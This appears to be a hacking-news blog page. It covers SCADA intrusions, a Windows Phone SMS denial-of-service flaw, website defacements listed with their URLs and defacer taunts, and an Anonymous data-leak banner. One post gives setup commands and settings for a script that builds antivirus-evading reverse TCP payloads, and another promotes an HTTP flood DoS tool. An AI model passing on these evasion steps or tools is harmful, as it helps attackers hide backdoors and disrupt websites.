BBC News Reported that the Federal Bureau of Investigation (FBI) announced recently that key infrastructure systems of three US cities had been accessed by hackers. Such systems commonly known as Supervisory Control and Data Acquisition (SCADA) are increasingly being targeted by hackers.

At a recent cybersecurity conference, Michael Welch, deputy assistant director of the FBI's cyber division, said "hackers had accessed crucial water and power services.The hackers could theoretically have dumped sewage into a lake or shut off the power to a shopping mall."

“We just had a circumstance where we had three cities, one of them a major city within the US, where you had several hackers that had made their way into SCADA systems within the city,” Welch told delegates at the Flemings Cyber Security conference.“Essentially it was an ego trip for the hacker because he had control of that city’s system and he could dump raw sewage into the lake, he could shut down the power plant at the mall a wide array of things,” he added.

In the city of South Houston, Texas, a hacker named pr0f claimed to have broken into a control system that supplied water to the town. Pr0f claimed the system had only been protected by a three-character password which “required almost no skill” to get around.

Security experts predict there will be a rise in such attacks."Such systems have become a target partly because of all the chatter about the lack of security. Hackers are doing it out of curiosity to see how poorly they are protected," said by senior security consultant at Sophos.

However the firms that run SCADA systems, such as Siemens, often advise against changing passwords because the threat from malware is not a big a problem as if passwords are changed.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

SMS Attack Vulnerability In Windows Phone 7.5

Khaled Salameh discovered a serious vulnerability on Windows phone 7.5 "Mango". He reported this vulnerability to WinRumors & Microsft.  If and when a security patch will be released from Microsoft's end to fix the issue is still unclear.

In an exclusive report it has been said that the Messaging Hub on Windows Phone 7.5 "Mango" devices can be completely disabled using a specially crafted SMS message. When a Windows Phone device receives the message, it causes the device to reboot and prevents the Messaging Hub from loading despite repeat attempts to open it. This Denial-of-Service (DoS) attack can also be exploited by sending a message from Facebook chat or Windows Live Messenger to the phone.

Video Demonstration:- 

Tom Warren fo WinRumor says that the only way to fix a device affected by the problem is to perform a hard reset and wipe the device, during which all personal data will be lost. They have also tested the attack on several phones such as the HTC TITIAN and the Samsung Focus Flash. These included devices running the 7740 build (7.10.7740.16) of Windows Phone 7.5 and Mango RTM build 7720 (7.10.7720.68).

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

9 Websites Hacked by aKfortyseven [League of Assassins]

Hey !
Some new defaces are done by aKfortyseven from League of Assassins

 Here are the details :-

http://mo5.cn/ak47.htm
http://jindr.cn/ak47.htm
http://www.skhlmcmps.edu.hk/ak47.htm
http://www.psdp-egypt.info/ak47.htm
http://card.baoanren.com/ak47.htm
http://www.yuhuangd.com/ak47.htm
http://lumjsoft.com/ak47.htm
http://shanzhaipc.org/ak47.htm
http://innovaiis.com/ak47.htm

Message by Defacer :-
No time to save mirrors ! Gonna fuck some more s00n !

Check out more defaces by akFortyseven HERE :)

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

70+ USA Sites Hacked By Robot Pirates

Robot Pirates a Pakistani hackers group has hacked more than 70 websites. Most of the sites belongs to USA. According to the hacker the main reason of this cyber attack is to protest the NATO's attack against Pakistani Army. Previously some other Pakistani hackers also protested against NATO and they ware Pak Cyber Combat Squad, Hitcher and so on. Robot Pirates released a pastebin where all the hacked sites and there mirror links & their messages are mentioned. Earlier this group has hacked many sites mostly Indian sites. 

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Facebook Ticker partially Removed Due To Various Bugs

According to a Post on Facebook Known Issues Page, Facebook has removed the ticker apparently motivated the social network to call the phenomenon a bug that’s undergoing a fix.

Facebook says that "Some people are seeing their ticker disappear. We are aware of this issue and are working to resolve it.". Comments explaining that people with less active accounts won’t see the feature, Because when your friends aren’t doing anything on the site, the ticker would only duplicate the news feed and not scroll, so there’s no point in the feature taking up part of your screen.

Not even this, Last month a Brazilian (independent) Security and Behavior Research had analyzed a privacy issue in Facebook Ticker that allows any person chasing you without your knowledge or consent .How Facebook Ticker exposing your information and behavior without your knowledge. Meanwhile, the Known Issues on Facebook page posted that some people aren’t seeing the ticker who should be, and that the site is working to fix this glitch and developers continues to refine the ticker, alternately testing labels for the feature along with shifting its location and size.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Script To Bypass Antivirus & Firewall By Security Labs

Security Labs Experts from Indian launch an automated Anti-Virus and Firewall Bypass Script. Its an Modified and Stable Version in order to work with Backtrack 5 distro. In order to compile the generated payload Mingw32 gcc must be installed on your system. 

Method:-

apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

After the installation you need to move the shell-script (Vanish.sh, We have mentioned the download link below) to default Metasploit folder (/pentest/exploits/framework) and execute it. Recommended Seed Number = 7000 and Number of Encode = 14.

Note: By default Script Generates Reverse TCP Payload but you can change it some modifications in Script [vanish.sh]. Virus Scan Report of Backdoor shows that its almost undetectable by most of the Antivirus programs.

To Download The Script Click Here

Security Labs Experts also released a pastebin. Rest of other information can be found from that release. 

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

600+ Anti-LGBT user details leaked by Anonymous

   /_______/\ /__/\ /__/\ /________/\/_______/\/_____/\ /_____/\ /_____/\    
 \::: _  \ \\::\_\\  \ \\__.::.__\/\__.::._\/\::::_\/_\::::_\/_\:::__\/    
  \::(_)  \ \\:. `-\  \ \  \::\ \     \::\ \  \:\/___/\\:\/___/\\:\ \  __  
   \:: __  \ \\:. _    \ \  \::\ \    _\::\ \__\_::._\:\\::___\/_\:\ \/_/\ 
    \:.\ \  \ \\. \`-\  \ \  \::\ \  /__\::\__/\ /____\:\\:\____/\\:\_\ \ \
     \__\/\__\/ \__\/ \__\/   \__\/  \________\/ \_____\/ \_____\/ \_____\/


                          AN @ANONOPSWORLD RELEASE
============================================================================


We Never Forgive
We Never Forget
Expect Us


-@AnonOpsWORLD


Ckeckout Full Details On Pastebin

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Assassin DoS Ver 2.0.3, A Powerful HTTP DOS Tool

Assassin DoS latest version 2.0.3 is developed by MaxPainCode. Assassin DoS new dos tool is based on a new attack that uses HTTP Flood to get the site down, this will work if you try with big dedicated server. Another Feature of Assassin DoS is that it will not take all your resources as the most DoS do. Also its like only 100 mili seconds delay when hitting the target and its available for windows.

To Download Assassin DoS 2.0.3 Click Here 

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

MO5.cn Defaced by Sen

A Popular wallpaper download website in china got hacked by SEN from Indian Cyber Army !

Defaced Website:- http://www.mo5.cn
Mirror of Defacement :- http://arab-zone.org/mirror/45839/mo5.cn/default.aspx

Message by SEN :-

Dont Panic Admin nothing deleted just want to tell you that i like all picx on this website and need you to update new picx :D ! Dont worry nothing deleted :P Next time keep a comment box so that i can share my views and i dont wana hack your website again and tell you the message :P also patch your securty xDBYE CYA :D

 You can check out more defacements by Indian Cyber Army here

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*